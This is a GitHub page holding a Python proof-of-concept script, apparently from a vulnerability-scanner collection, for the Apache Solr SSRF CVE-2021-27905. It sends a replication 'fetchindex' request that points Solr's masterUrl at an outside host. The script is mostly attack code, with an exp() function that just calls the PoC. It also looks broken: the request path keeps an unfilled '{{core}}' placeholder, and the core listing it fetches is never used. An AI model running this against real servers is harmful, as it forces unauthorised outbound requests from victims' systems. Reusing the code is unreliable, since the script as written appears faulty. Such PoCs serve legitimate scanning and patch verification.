-
Notifications
You must be signed in to change notification settings - Fork 220
/
Copy pathCVE-2021-27905.py
76 lines (60 loc) · 2.66 KB
/
CVE-2021-27905.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
import requests
# Vuln Base Info
def info():
return {
"author": "cckuailong",
"name": '''Apache Solr <= 8.8.1 SSRF''',
"description": '''The ReplicationHandler (normally registered at "/replication" under a Solr core) in Apache Solr has a "masterUrl" (also "leaderUrl" alias) parameter that is used to designate another ReplicationHandler on another Solr core to replicate index data into the local core. To prevent a SSRF vulnerability, Solr ought to check these parameters against a similar configuration it uses for the "shards" parameter. Prior to this bug getting fixed, it did not. This problem affects essentially all Solr versions prior to it getting fixed in 8.8.2.''',
"severity": "critical",
"references": [
"https://www.anquanke.com/post/id/238201",
"https://ubuntu.com/security/CVE-2021-27905",
"https://nvd.nist.gov/vuln/detail/CVE-2021-27905",
"https://nsfocusglobal.com/apache-solr-arbitrary-file-read-and-ssrf-vulnerability-threat-alert/"
],
"classification": {
"cvss-metrics": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"cvss-score": "",
"cve-id": "CVE-2021-27905",
"cwe-id": "CWE-918"
},
"metadata":{
"vuln-target": "",
},
"tags": ["cve", "cve2021", "apache", "solr", "ssrf"],
}
# Vender Fingerprint
def fingerprint(url):
return True
# Proof of Concept
def poc(url):
result = {}
try:
url = format_url(url)
path = """/solr/admin/cores?wt=json"""
method = "GET"
data = """"""
headers = {'Accept-Language': 'en', 'Connection': 'close'}
resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
path = """/solr/{{core}}/replication/?command=fetchindex&masterUrl=https://example.com"""
method = "GET"
data = """"""
headers = {'Accept-Language': 'en', 'Connection': 'close'}
resp1 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
if ("""<str name="status">OK</str>""" in resp1.text):
result["success"] = True
result["info"] = info()
result["payload"] = url+path
except:
result["success"] = False
return result
# Exploit, can be same with poc()
def exp(url):
return poc(url)
# Utils
def format_url(url):
url = url.strip()
if not ( url.startswith('http://') or url.startswith('https://') ):
url = 'http://' + url
url = url.rstrip('/')
return url